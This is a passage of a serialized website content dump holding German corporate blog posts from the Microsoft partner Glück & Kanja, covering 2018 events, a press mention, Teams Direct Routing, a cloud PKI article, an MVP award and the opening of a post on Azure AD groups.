insbesondere Ihre IT-Sicherheitsmannschaft adressiert. Wir freuen uns darauf, mit Ihnen in die Diskussion einer neuen IT-Security Strategie einzusteigen.",[353,1157,1158,1162,1165,1166,1169,1170,1173],{},[374,1159,1131],{"href":1160,"rel":1161},"https://www.microsoftevents.com/profile/form/index.cfm?PKformID=0x3882708abcd",[378],[433,1163,1164],{},"Datum:"," Montag, 23. April 2018\n",[433,1167,1168],{},"Uhrzeit:"," 9:00 bis 17:30 Uhr\n",[433,1171,1172],{},"Ort:"," Microsoft Deutschland GmbH, Walter-Gropius-Straße 5, 80807 München",[353,1175,1176,1177,456],{},"Die ausführliche Agenda und Informationen zu den Referenten finden Sie auf der ",[374,1178,1180],{"href":1160,"rel":1179},[378],"Registrierungswebsite",[353,1182,1183],{},"Die Teilnahme an diesem Workshop ist für Sie kostenlos.",{"title":402,"searchDepth":403,"depth":403,"links":1185},[],"In Zusammenarbeit mit der Enterprise Cybersecurity Group von Microsoft und weiteren Partnern laden wir Sie deshalb zu einem exklusiven Threat Management Workshop in München ein. Sie erhalten von Security Experten Informationen zur Cybersecurity Strategie, Einblicke wie Microsoft Cyberkriminalität bekämpft und wie Windows Defender ATP, Office 365 ATP und Azure ATP bei der Erkennung und Reaktion auf Cyber-Angriffe unterstützten kann.",{"categories":1188,"blogtitlepic":1189,"thumb":1190,"socialimg":1191,"customExcerpt":1192},[1117],"head-threat-management","thumb-threat-management","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/heads/head-threat-management.jpg","Es dauert durchschnittlich 200 Tage, bis eine Organisation einen Cyber-Angriff überhaupt erkennt und häufig weitere 80 Tage, bis dieser endgültig gestoppt wird. Angesichts der zunehmenden Komplexität im Security-Umfeld und der Bedrohungen, denen wir alle durch professionalisierte Cyberkriminelle ausgesetzt sind, hat der Schutz Ihrer IT und Ihrer Organisation die höchste Priorität.","2018-04-06","/posts/2018-04-06-ms-threat-management-workshop",{"title":1131,"description":1186},"posts/2018-04-06-ms-threat-management-workshop",[422],"BDQfqy9UR1-k2CUSlDUig4L3msFbrKaDz_50yPqxGgE",{"id":1200,"title":1201,"author":191,"body":1202,"cta":3,"description":1259,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":1260,"moment":1265,"navigation":415,"path":1266,"seo":1267,"stem":1268,"tags":1269,"webcast":406,"__hash__":1270},"content_de/posts/2018-04-20-brad-anderson-besuch.md","Brad Anderson @ Glück & Kanja",{"type":350,"value":1203,"toc":1257},[1204,1216,1225,1233,1244,1247,1249],[353,1205,1206,1211,1212,1215],{},[374,1207,1210],{"href":1208,"rel":1209},"https://news.microsoft.com/ignite-envision-2017/photos/brad-anderson-microsoft-corporate-vice-president-enterprise-mobile-microsoft-envision-2017/",[378],"Brad Anderson",", Corporate Vice President von Microsoft, legte heute morgen auf seiner Tour quer durch Europa einen Zwischenstopp in Offenbach ein. Der Microsoft Enterprise Mobility Chef besuchte ",[433,1213,1214],{},"Glück & Kanja",", um sich mit den deutschen Top-Partnern auszutauschen, und sowohl einen Einblick vom deutschen Markt zu bekommen, als auch einen Ausblick auf die nächsten 18 Monate EMS und Microsoft Security zu geben.",[353,1217,1218,1219,1224],{},"Brad ist ein drahtiger, sportlicher Mann, der klare Worte findet. Wer seine Video-Serie ",[374,1220,1223],{"href":1221,"rel":1222},"https://www.youtube.com/playlist?list=PL8nfc9haGeb4h0xDswkkS0I0b3KFxWsuO",[378],"Brad Anderson’s Lunch Break"," kennt, weiss, dass er auch für jeden Spass zu haben ist. So gestaltete sich auch der Termin als kurzweilig und informativ, und es war noch genug Zeit für eine Fotosession.",[353,1226,1227,1230],{},[356,1228],{"alt":1201,"src":1229},"https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/pics/brad-anderson-gk.jpg",[748,1231,1232],{},"Brad Anderson, Christian Kanja",[353,1234,1235,1236,1239,1240,1243],{},"Absoluter Konsens war der klare Weg zu ",[433,1237,1238],{},"100% Cloud mit Microsoft 365",". Dabei wurden auch weitere Details zur Zukunft von Microsoft Intune und Modern Management diskutiert. Der Fokus auf Identity mit Azure AD und der Wegfall alter Security-Paradigmen wurde ebenfalls an der klaren Strategie rund um die Microsoft Security Technologien ",[433,1241,1242],{},"Defender ATP und Conditional Access"," verdeutlicht. Erneut bestätigt sich damit unsere Strategie einer effizienten und sicheren Cloud-Transformation für unsere Kunden.",[353,1245,1246],{},"Thanks for visiting Glück & Kanja, Brad. We're looking forward to seeing you the next time!",[399,1248],{},[353,1250,1251,1256],{},[374,1252,1255],{"href":1253,"rel":1254},"https://www.linkedin.com/feed/update/urn:li:activity:6393846172011888641/",[378],"Brad's Recap"," of two days spending with customers and partners in Germany",{"title":402,"searchDepth":403,"depth":403,"links":1258},[],"Brad Anderson, Corporate Vice President von Microsoft, legte heute morgen auf seiner Tour quer durch Europa einen Zwischenstopp in Offenbach ein. Der Microsoft Enterprise Mobility Chef besuchte Glück & Kanja, um sich mit den deutschen Top-Partnern auszutauschen, und sowohl einen Einblick vom deutschen Markt zu bekommen, als auch einen Ausblick auf die nächsten 18 Monate EMS und Microsoft Security zu geben.",{"categories":1261,"blogtitlepic":1262,"thumb":1263,"socialimg":1264,"customExcerpt":1259},[410],"head-brad-anderson-visit","thumb-brad-anderson-visit","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/heads/head-brad-anderson-visit.jpg","2018-04-20","/posts/2018-04-20-brad-anderson-besuch",{"title":1201,"description":1259},"posts/2018-04-20-brad-anderson-besuch",[422],"I-SjblSWIUVstPu4EOockKPGRMyFA9m9i-O-28tumlY",{"id":1272,"title":1273,"author":191,"body":1274,"cta":3,"description":1292,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":1293,"moment":1299,"navigation":415,"path":1300,"seo":1301,"stem":1303,"tags":1304,"webcast":406,"__hash__":1308},"content_de/posts/2018-05-15-gk-im-handelsblatt.md","Glück & Kanja im Handelsblatt",{"type":350,"value":1275,"toc":1290},[1276,1282],[353,1277,1278,1281],{},[433,1279,1280],{},"Microsofts bester EMS Partner kommt aus Deutschland."," Als Microsoft für sein aktuelles Geschäftsjahr für die sichere, strategisch beste Cloud-Transformation den weltweiten Partner des Jahres ausgezeichnet hat, ging die Auszeichnung nach Offenbach zu Glück & Kanja. Das Unternehmen begleitet Enterprise-Kunden beim Wechsel der eigenen IT in die Microsoft 365 Cloud-Lösung und hat dazu Herangehensweisen entwickelt, die den Übergang besonders vereinfachen.\nWeltweit agierende Unternehmen aus unterschiedlichen Branchen haben damit ihre Infrastruktur in die Microsoft-Cloud überführt und einen Modern Workplace mit der Einführung von Windows 10 etabliert. Dabei wird der Arbeitsplatz zu einem vollständig aus der Cloud gemanagten System, das ortsunabhängig sicher betrieben und mit Softwarepaketen, Anwenderpräferenzen und Daten versorgt werden kann.",[367,1283,1284],{},[370,1285,1286],{},[374,1287,1289],{"href":1288},"/documents/press-releases/201805-gk-Seite-3-Handelsblatt.pdf","Handelsblatt Seite 3 (15.05.2018)",{"title":402,"searchDepth":403,"depth":403,"links":1291},[],"Microsofts bester EMS Partner kommt aus Deutschland. Als Microsoft für sein aktuelles Geschäftsjahr für die sichere, strategisch beste Cloud-Transformation den weltweiten Partner des Jahres ausgezeichnet hat, ging die Auszeichnung nach Offenbach zu Glück & Kanja. Das Unternehmen begleitet Enterprise-Kunden beim Wechsel der eigenen IT in die Microsoft 365 Cloud-Lösung und hat dazu Herangehensweisen entwickelt, die den Übergang besonders vereinfachen.\\nWeltweit agierende Unternehmen aus unterschiedlichen Branchen haben damit ihre Infrastruktur in die Microsoft-Cloud überführt und einen Modern Workplace mit der Einführung von Windows 10 etabliert. Dabei wird der Arbeitsplatz zu einem vollständig aus der Cloud gemanagten System, das ortsunabhängig sicher betrieben und mit Softwarepaketen, Anwenderpräferenzen und Daten versorgt werden kann.",{"categories":1294,"blogtitlepic":1295,"thumb":1296,"socialimg":1297,"customExcerpt":1298},[410],"head-gk-im-handelsblatt","thumb-gk-im-handelsblatt","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/heads/head-gk-im-handelsblatt.jpg","Als Microsoft für sein aktuelles Geschäftsjahr für die sichere, strategisch beste Cloud-Transformation den weltweiten Partner des Jahres ausgezeichnet hat, ging die Auszeichnung nach Offenbach zu Glück & Kanja. Das Unternehmen begleitet Enterprise-Kunden beim Wechsel der eigenen IT in die Microsoft 365 Cloud-Lösung und hat dazu Herangehensweisen entwickelt, die den Übergang besonders vereinfachen.","2018-05-15","/posts/2018-05-15-gk-im-handelsblatt",{"title":1273,"description":1302},"Microsofts bester EMS Partner kommt aus Deutschland. Als Microsoft für sein aktuelles Geschäftsjahr für die sichere, strategisch beste Cloud-Transformation den weltweiten Partner des Jahres ausgezeichnet hat, ging die Auszeichnung nach Offenbach zu Glück & Kanja. Das Unternehmen begleitet Enterprise-Kunden beim Wechsel der eigenen IT in die Microsoft 365 Cloud-Lösung und hat dazu Herangehensweisen entwickelt, die den Übergang besonders vereinfachen.\nWeltweit agierende Unternehmen aus unterschiedlichen Branchen haben damit ihre Infrastruktur in die Microsoft-Cloud überführt und einen Modern Workplace mit der Einführung von Windows 10 etabliert. Dabei wird der Arbeitsplatz zu einem vollständig aus der Cloud gemanagten System, das ortsunabhängig sicher betrieben und mit Softwarepaketen, Anwenderpräferenzen und Daten versorgt werden kann.","posts/2018-05-15-gk-im-handelsblatt",[1305,1306,1307],"Handelsblatt","EMS Partner","Presse","HEkmEfej3SFbUpR9iR1SLNJmZjdbiKoTE6ZI9jUiEn0",{"id":1310,"title":1311,"author":73,"body":1312,"cta":3,"description":1396,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":1397,"moment":1403,"navigation":415,"path":1404,"seo":1405,"stem":1406,"tags":1407,"webcast":406,"__hash__":1409},"content_de/posts/2018-05-18-teams-direct-routing.md","Microsoft Teams – Direct Routing in Public Preview",{"type":350,"value":1313,"toc":1393},[1314,1325,1328,1334,1340,1343,1350,1353,1360,1367,1374,1385,1388,1390],[353,1315,1316,1317,1320,1321,1324],{},"Schon seit Jahren gibt es den Wunsch bei Kunden, einen vorhandenen ",[433,1318,1319],{},"Session Border Controller (SBC)"," oder das ",[433,1322,1323],{},"PSTN Media Gateway (MGW)"," direkt mit der Microsoft Cloud zu verbinden, um zum Beispiel Telefonie Funktionen mit relativ wenig Aufwand testen zu können.",[353,1326,1327],{},"Mit Skype for Business Hybrid war es möglich, mit dem Einsatz der Cloud Connector Edition (CCE) halbwegs ohne Zusatzprodukte die vorhandenen Telefonie-Systeme und -Leitungen mit der Cloud zu verbinden. Aber trotzdem musste obendrein ein performanter Hyper-V Host zur Verfügung gestellt werden.",[353,1329,1330],{},[356,1331],{"alt":1332,"src":1333},"Direct Routing","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/pics/direct-routing.jpg",[353,1335,1336,1337,1339],{},"Mit Teams hat Microsoft nun das ",[433,1338,1332],{}," eingeführt. Diese Funktion bringt die Möglichkeit, vorhandene Systeme, sofern sie denn zertifiziert sind, mit der O365 Cloud direkt zu verbinden. Das heißt, es wird ein von O365 vertrauenswürdiges Zertifikat, ein passender FQDN und eine passende öffentliche IP Adresse benötigt. Dann noch wenige Konfigurationsschritte in der Cloud und Anrufe können über den SBC/MGW geführt werden. Vorhandene Rufnummern werden beibehalten.",[353,1341,1342],{},"Besonders für Kunden mit einer größeren Anzahl von Branch Sites, die aktuell mit SBA/SBS ausgestattet sind, kann diese Funktion wertvoll sein. Anstatt weiter die lokale SBA/SBS zu betreiben, können User in die Cloud auf Teams migriert werden, und das vorhandene SBC/MGW routet die Anrufe wie gewohnt vom und zum PSTN.",[353,1344,1345,1346,1349],{},"Es gibt bereits die Möglichkeit, vorhandene Rufnummernblöcke in die O365 Cloud zu portieren und dann die ",[433,1347,1348],{},"Microsoft Calling Plans"," zu nutzen. Das Preismodell von Microsoft hat aber besonders in Zentraleuropa keine Begeisterung ausgelöst, da jede Rufnummer unabhängig ihrer Nutzung hohe Kosten generiert. Mit Direct Routing hat der Kunde nun die Möglichkeit, sogar seine existierende PBX weiter zu betreiben und lediglich Rufnummern der Teams User in die Cloud zu routen.",[353,1351,1352],{},"Über den SBC können auch weitere ATAs angebunden werden, so dass selbst analoge Endgeräte oder Systeme wie beispielsweise DECT angebunden werden können. Somit können Teams User über Direct Routing alle Rufnummern im Unternehmen erreichen.",[353,1354,1355,1356,1359],{},"Aktuell ist ",[433,1357,1358],{},"Media Bypass"," für Direct Routing nicht verfügbar, aber in den Einstellungen für das PSTN Gateway ist es bereits als Option mit der Anmerkung \"For future use\" vorhanden. Wann dieses Feature letztendlich zur Verfügung steht, ist allerdings noch offen, somit sollte die Internet Verbindung zwischen SBC/MGW und O365 die doppelte Anzahl von Anrufen verkraften können.",[353,1361,1362,1363,1366],{},"Mit Direct Routing ist, wie auch mit Skype for Business OnPrem, ",[433,1364,1365],{},"Least Cost Routing"," möglich. So können mehrere PSTN Usages in einer Voice Policy nacheinander verarbeitet werden. Auch ein Backup Routing ist somit möglich, wenn ein SBC/MGW vorübergehend nicht erreichbar ist.",[353,1368,1369,1370,1373],{},"Viele Kunden nutzen bereits für Skype for Business zertifizierte MGWs oder SBCs, diese sind ebenfalls für Teams Direct Routing zertifiziert. Interessant ist, dass in dieser Liste auch Thinktel auftaucht. Thinktel ist kein SBC Hersteller im eigentlichen Sinn, sondern ein ",[433,1371,1372],{},"SIP Trunk Anbieter"," aus Kanada. Hier bleibt die Hoffnung, dass die Liste mit SIP Trunk Anbietern weiter wächst und so SIP Trunks von den Kunden direkt in die O365 Cloud portiert werden können. Bei einem solchen Szenario wäre gar keine Infrastruktur beim Kunden mehr nötig, sofern lokal keine analogen Geräte oder ähnliches benötigt werden. Tarife, die der Kunde mit dem Carrier ausgehandelt hat, könnten so aus O365 heraus konsumiert werden. Warten wir ab, was die Zukunft hier bringt.",[353,1375,1376,1377,1380,1381,1384],{},"Voraussetzungen für das Direct Routing sind einfach zu erfüllen. Direct Routing funktioniert allerdings nur mit Teams! Skype for Business Online User können nur über einen CCE an einen eigenen SBC/MGM geroutet werden! User, die Direct Routing nutzen wollen, müssen somit Private Calling aktiviert haben. Dazu muss Teams als präferierter Call Client festgelegt sein. Wie schon in Skype for Business geht nichts ohne Policies, somit muss eine ",[433,1378,1379],{},"Teams Calling Policy"," und eine ",[433,1382,1383],{},"Teams Interop Policy"," den Usern zugewiesen werden, so dass am Ende auch Anrufe korrekt geroutet werden.",[353,1386,1387],{},"Für die Teams Calling Policy müssen ebenfalls, analog Skype for Business, PSTN Usages, Voice Routes und Voice Routing Policies konfiguriert werden.",[629,1389,1088],{"id":1087},[353,1391,1392],{},"Mit Direct Routing bringt Microsoft die Funktion, die vielen Kunden die Option bietet, vorhandene PSTN und PBX Anbindungen mit Teams und Cloud PBX zusammenzuführen. Auch bietet es die Möglichkeit, Cloud PBX mit eigenen Provider Modellen zu betreiben und so gegebenfalls kostengünstiger den vollständigen Weg in die Cloud anzutreten. Besonders in Europa kann es ein preislich attraktiver Weg sein, die großen Durchwahlbereiche in die Cloud zu migrieren. Allerdings ist weiterhin zu beachten, dass diese Funktion nur mit Teams genutzt werden kann. Die nächsten Monate werden voraussichtlich noch Neuerungen bringen, die den Einsatz von Teams als Telefonielösung weiter unterstützen.",{"title":402,"searchDepth":403,"depth":403,"links":1394},[1395],{"id":1087,"depth":704,"text":1088},"Schon seit Jahren gibt es den Wunsch bei Kunden, einen vorhandenen Session Border Controller (SBC) oder das PSTN Media Gateway (MGW) direkt mit der Microsoft Cloud zu verbinden, um zum Beispiel Telefonie Funktionen mit relativ wenig Aufwand testen zu können.",{"categories":1398,"blogtitlepic":1399,"thumb":1400,"socialimg":1401,"customExcerpt":1402},[534],"head-teams-direct-routing","thumb-teams-direct-routing","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/heads/head-teams-direct-routing.jpg","Mit Teams hat Microsoft nun das Direct Routing eingeführt. Diese Funktion bringt die Möglichkeit, vorhandene Systeme, sofern sie denn zertifiziert sind, mit der O365 Cloud direkt zu verbinden. Das heißt, es wird ein von O365 vertrauenswürdiges Zertifikat, ein passender FQDN und eine passende öffentliche IP Adresse benötigt. Dann noch wenige Konfigurationsschritte in der Cloud und Anrufe können über den SBC/MGW geführt werden. Vorhandene Rufnummern werden beibehalten.","2018-05-18","/posts/2018-05-18-teams-direct-routing",{"title":1311,"description":1396},"posts/2018-05-18-teams-direct-routing",[534,1408,964],"Collaboration","cRHfgtHMeMpQoptRhnUgTJAw8s1t19AoZmZxLeHlHWE",{"id":1411,"title":1412,"author":73,"body":1413,"cta":3,"description":1467,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":1468,"moment":1474,"navigation":415,"path":1475,"seo":1476,"stem":1477,"tags":1478,"webcast":406,"__hash__":1479},"content_de/posts/2018-06-28-direct-routing-ga.md","Nachtrag: Direct Routing now Generally Available",{"type":350,"value":1414,"toc":1463},[1415,1421,1424,1428,1431,1436,1440,1443,1448],[353,1416,1417,1418,1420],{},"Seit dem 28.06.2018 ist ",[433,1419,1332],{}," generell verfügbar. Kunden können nun ihre vorhandenen Telefonanschlüsse an die O365 Cloud anbinden und über Microsoft Teams nutzen.",[353,1422,1423],{},"In diesem Zuge wurden auch beide Optionen von Direct Routing freigegeben.",[629,1425,1427],{"id":1426},"kundenseitige-bereitstellung","Kundenseitige Bereitstellung",[353,1429,1430],{},"Hier stellt der Kunde einen SBC/Media Gateway zur Verfügung, der direkt mit der O365 Cloud kommuniziert. Vorhandene Telefonanschlüsse bleiben unverändert. Eventuell vorhandene Geräte können einfach weiter betrieben werden. Zertifizierte Hersteller sind AudioCodes und Ribbon.",[353,1432,1433],{},[356,1434],{"alt":1427,"src":1435},"https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/pics/img-customer-deployed-scenario.png",[629,1437,1439],{"id":1438},"partnerseitige-bereitstellung","Partnerseitige Bereitstellung",[353,1441,1442],{},"Hier wird die Anbindung an die O365 Cloud von Telefon-Providern direkt durchgeführt. In Deutschland ist die Telekom Deutschland für diesen Dienst zertifiziert.\nIn diesem Szenario sind keine Komponenten mehr beim Kunden vorhanden. Eventuell vorhandene Systeme, wie Fax, analoge Telefone etc. müssen separat berücksichtigt werden. Zertifizierte Anbieter sind: Deutsche Telekom, BezeQ International, Cellip, Nuwave Communications, Orange Business Services, Swisscom, TATA, Telenor, Thinktel und West.",[353,1444,1445],{},[356,1446],{"alt":1439,"src":1447},"https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/pics/img-partner-hosted-scenario.png",[353,1449,1450,1453,1458],{},[433,1451,1452],{},"Weitere Informationen",[374,1454,1457],{"href":1455,"rel":1456},"https://glueckkanja.com/blog/teams/collaboration/2018/05/teams-direct-routing/",[378],"Microsoft Teams - Direct Routing in Public Preview",[374,1459,1462],{"href":1460,"rel":1461},"https://techcommunity.microsoft.com/t5/Microsoft-Teams-Blog/Direct-Routing-is-now-Generally-Available/ba-p/210359",[378],"Link zur Microsoft TechCommunity",{"title":402,"searchDepth":403,"depth":403,"links":1464},[1465,1466],{"id":1426,"depth":704,"text":1427},{"id":1438,"depth":704,"text":1439},"Seit dem 28.06.2018 ist Direct Routing generell verfügbar. Kunden können nun ihre vorhandenen Telefonanschlüsse an die O365 Cloud anbinden und über Microsoft Teams nutzen.",{"categories":1469,"blogtitlepic":1470,"thumb":1471,"socialimg":1472,"customExcerpt":1473},[534],"head-direct-routing-ga","thumb-direct-routing-ga","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/heads/head-direct-routing-ga.jpg","Seit dem 28.06.2018 ist **Direct Routing** generell verfügbar. Kunden können nun ihre vorhandenen Telefonanschlüsse an die O365 Cloud anbinden und über Microsoft Teams nutzen.","2018-06-28","/posts/2018-06-28-direct-routing-ga",{"title":1412,"description":1467},"posts/2018-06-28-direct-routing-ga",[534,1408,964],"r24D_t0kiMOp_B_KDfsXI-I08NtP4tXZ91iJOxacQFo",{"id":1481,"title":1482,"author":191,"body":1483,"cta":3,"description":1509,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":1510,"moment":1516,"navigation":415,"path":1517,"seo":1518,"stem":1519,"tags":1520,"webcast":406,"__hash__":1523},"content_de/posts/2018-07-11-pki-in-der-cloud.md","PKI in der Cloud",{"type":350,"value":1484,"toc":1507},[1485,1492],[353,1486,1487,1488,456],{},"Wird in einer Cloud-Infrastruktur noch eine eigene PKI benötigt? Mit dieser Frage hat sich unser Security-Experte Dr. Christoph Hannebauer intensiv in der Juli Ausgabe der Zeitschrift iX beschäftigt. Lesen Sie den ganzen Artikel ",[374,1489,1491],{"href":1490},"/documents/articles/201807-iX-PKI-in-der-Cloud.pdf","hier",[353,1493,1494,1501,1502],{},[374,1495,1498],{"href":1496,"rel":1497},"https://www.heise.de/select/ix/2018/7/1530936603778729?nid=d_nMdVDn#",[378],[356,1499],{"alt":1332,"src":1500},"https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/pics/201807-cover-ix.jpg"," ",[374,1503,1504],{"href":1490},[356,1505],{"alt":1332,"src":1506},"https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/pics/201807-artikel-ix.jpg",{"title":402,"searchDepth":403,"depth":403,"links":1508},[],"Wird in einer Cloud-Infrastruktur noch eine eigene PKI benötigt? Mit dieser Frage hat sich unser Security-Experte Dr. Christoph Hannebauer intensiv in der Juli Ausgabe der Zeitschrift iX beschäftigt. Lesen Sie den ganzen Artikel hier.",{"categories":1511,"blogtitlepic":1512,"thumb":1513,"socialimg":1514,"customExcerpt":1515},[1117],"head-pki-in-der-cloud","thumb-pki-in-der-cloud","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/heads/head-pki-in-der-cloud.jpg","Wird in einer Cloud-Infrastruktur noch eine eigene PKI benötigt? Mit dieser Frage hat sich unser Security-Experte Dr. Christoph Hannebauer intensiv in der Juli Ausgabe der Zeitschrift iX beschäftigt.","2018-07-11","/posts/2018-07-11-pki-in-der-cloud",{"title":1482,"description":1509},"posts/2018-07-11-pki-in-der-cloud",[1521,1522],"Cloud","PKI","O8XysiqjGHTz5Auel5C3xDrvw50f_ZSrigM0UTdULb8",{"id":1525,"title":1526,"author":191,"body":1527,"cta":3,"description":1550,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":1551,"moment":1557,"navigation":415,"path":1558,"seo":1559,"stem":1560,"tags":1561,"webcast":406,"__hash__":1563},"content_de/posts/2018-07-15-gk-auf-inspire.md","Glück & Kanja @ Inspire 2018",{"type":350,"value":1528,"toc":1548},[1529,1542],[353,1530,1531,1532,993,1537,456],{},"Heute startet in Las Vegas wieder die weltweit wichtigste Partnerveranstaltung von Microsoft. Die Konferenz Inspire findet dieses Jahr vom 15. bis 19. Juli 2018 im Hotel Mandala Bay und der T-Mobile Arena in Las Vegas statt. Auch dieses Jahr ist Glück & Kanja live vor Ort dabei. Wir berichten, wie wir mit unserer Lösung unsere Kunden optimal auf dem Weg zu einer cloudbasierten Infrastruktur begleitet haben. Gleich auf zwei Sessions sind wir mit unserem 100% Cloud Konzept auf der Inspire 2018 vertreten: ",[374,1533,1536],{"href":1534,"rel":1535},"https://myinspire.microsoft.com/sessions/acbac6c1-2e87-44ec-9ad0-c69bea3a18ef?source=sessions",[378],"Microsoft 365 and the modern desktop opportunity",[374,1538,1541],{"href":1539,"rel":1540},"https://myinspire.microsoft.com/sessions/9ab7242a-bbae-4af1-90b9-e7a5a7a3c9b0?source=sessions",[378],"Maximize the Modern Desktop opportunity by utilizing new partner investments",[353,1543,1544],{},[356,1545],{"alt":1546,"src":1547},"Inspire Lobby","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/pics/201807-inspire.jpg",{"title":402,"searchDepth":403,"depth":403,"links":1549},[],"Heute startet in Las Vegas wieder die weltweit wichtigste Partnerveranstaltung von Microsoft. Die Konferenz Inspire findet dieses Jahr vom 15. bis 19. Juli 2018 im Hotel Mandala Bay und der T-Mobile Arena in Las Vegas statt. Auch dieses Jahr ist Glück & Kanja live vor Ort dabei. Wir berichten, wie wir mit unserer Lösung unsere Kunden optimal auf dem Weg zu einer cloudbasierten Infrastruktur begleitet haben. Gleich auf zwei Sessions sind wir mit unserem 100% Cloud Konzept auf der Inspire 2018 vertreten: Microsoft 365 and the modern desktop opportunity und Maximize the Modern Desktop opportunity by utilizing new partner investments.",{"categories":1552,"blogtitlepic":1553,"thumb":1554,"socialimg":1555,"customExcerpt":1556},[410],"head-inspire-las-vegas","thumb-inspire-las-vegas","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/heads/head-inspire-las-vegas.jpg","Heute startet in Las Vegas wieder die weltweit wichtigste Partnerveranstaltung von Microsoft. Die Konferenz Inspire findet dieses Jahr vom 15. bis 19. Juli 2018 im Hotel Mandala Bay und der T-Mobile Arena in Las Vegas statt.","2018-07-15","/posts/2018-07-15-gk-auf-inspire",{"title":1526,"description":1550},"posts/2018-07-15-gk-auf-inspire",[422,1562],"Events","NU-Y4pkPF9FYvh-uKlk9Fhs4Z05OWdkO1p16kzdUg5U",{"id":1565,"title":1566,"author":191,"body":1567,"cta":3,"description":1614,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":1615,"moment":1620,"navigation":415,"path":1621,"seo":1622,"stem":1623,"tags":1624,"webcast":406,"__hash__":1626},"content_de/posts/2018-08-02-kieselbach-wird-mvp.md","Oliver Kieselbach wird Microsoft MVP für Enterprise Mobility",{"type":350,"value":1568,"toc":1612},[1569,1580,1583,1589,1596,1599,1602,1604],[353,1570,1571,1572,1575,1576,1579],{},"MVP steht für ",[433,1573,1574],{},"Most Valuable Professional"," und zeichnet leidenschaftliche Technologieexperten aus, die ihr Wissen mit der Community teilen. Ab sofort gehört auch unser Kollege Oliver Kieselbach dieser technischen Elite an und ist damit in der Kategorie ",[433,1577,1578],{},"Enterprise Mobility"," aktuell einer von 4 MVPs in Deutschland.",[353,1581,1582],{},"Die Nominierung gilt für ein Jahr und wird von Microsoft an unabhängige Spezialisten für ihren außerordentlichen Einsatz sowie ihre hohe fachliche Kompetenz in Microsoft-Technologien verliehen. Die Jury besteht dabei aus Mitgliedern des MVP-Teams und den Produktgruppenteams bei Microsoft. Bewertet wird das technische Know-how und der unentgeltliche sowie freiwillige Beitrag zur Community.",[353,1584,1585],{},[356,1586],{"alt":1587,"src":1588},"Microsoft Most Valuable Professional Logo","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/pics/mvp-logo.png",[353,1590,1591,1592,1595],{},"Durch sein Engagement konnte Oliver beste Kontakte nach Redmond aufbauen und hält den direkten Draht in das ",[433,1593,1594],{},"Intune- und Azure AD Identity-Produktteam",". Inzwischen stehen regelmäßige Besuche der Redmonder auf dem Programm, um gemeinsam Kunden zu besuchen und sich so vor Ort einen Einblick über Arbeitsweisen und Anforderungen zu verschaffen. In der Folge wird gemeinsam an Funktionen gearbeitet, die beim Kunden benötigt werden.",[353,1597,1598],{},"Mit dieser Auszeichnung unterstreicht Oliver nicht nur seinen hohen Qualitätsanspruch, sondern hebt auch unsere exklusive Expertise hervor, die uns weltweit zu den Top Microsoft Partnern zählen lässt, die intensiv an der Zukunft der Microsoft-Technologien beteiligt sind.",[353,1600,1601],{},"Wir gratulieren Oliver herzlich zu seiner Auszeichnung!",[399,1603],{},[353,1605,1606,1607,456],{},"Olivers Beiträge für die Community findet Ihr ",[374,1608,1611],{"href":1609,"rel":1610},"https://oliverkieselbach.com/",[378],"in seinem Blog",{"title":402,"searchDepth":403,"depth":403,"links":1613},[],"MVP steht für Most Valuable Professional und zeichnet leidenschaftliche Technologieexperten aus, die ihr Wissen mit der Community teilen. Ab sofort gehört auch unser Kollege Oliver Kieselbach dieser technischen Elite an und ist damit in der Kategorie Enterprise Mobility aktuell einer von 4 MVPs in Deutschland.",{"categories":1616,"blogtitlepic":1617,"thumb":1618,"socialimg":1619,"customExcerpt":1614},[410],"head-kieselbach-mvp","thumb-kieselbach-mvp","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/heads/head-kieselbach-mvp.jpg","2018-08-02","/posts/2018-08-02-kieselbach-wird-mvp",{"title":1566,"description":1614},"posts/2018-08-02-kieselbach-wird-mvp",[422,1625],"MVP","ZMenwS1UABMfplhou804QWZcuUauAslb6_HpEcjgDJE",{"id":1628,"title":1629,"author":1630,"body":1631,"cta":3,"description":1635,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":1761,"moment":1767,"navigation":415,"path":1768,"seo":1769,"stem":1770,"tags":1771,"webcast":406,"__hash__":1774},"content_de/posts/2018-08-15-gruppen-in-azure-und-o365.md","Gruppen in Azure und Office 365","Christoph Hannebauer",{"type":350,"value":1632,"toc":1750},[1633,1636,1639,1645,1648,1668,1672,1675,1678,1681,1684,1687,1698,1701,1705,1708,1712,1715,1719,1722,1726,1729,1733,1736,1740,1743,1747],[353,1634,1635],{},"Seit gut anderthalb Jahrzehnten ist das Active Directory der typische Verzeichnisdienst bei Unternehmen. Entsprechend gehören Art und Bedeutung der zahlreichen Gruppentypen – wie Domain Local, Global und Universal – zum Basis-Know-how der AD-Administratoren. Doch im 100%-Cloud-Konzept ist das Azure Active Directory (Azure AD oder AAD) 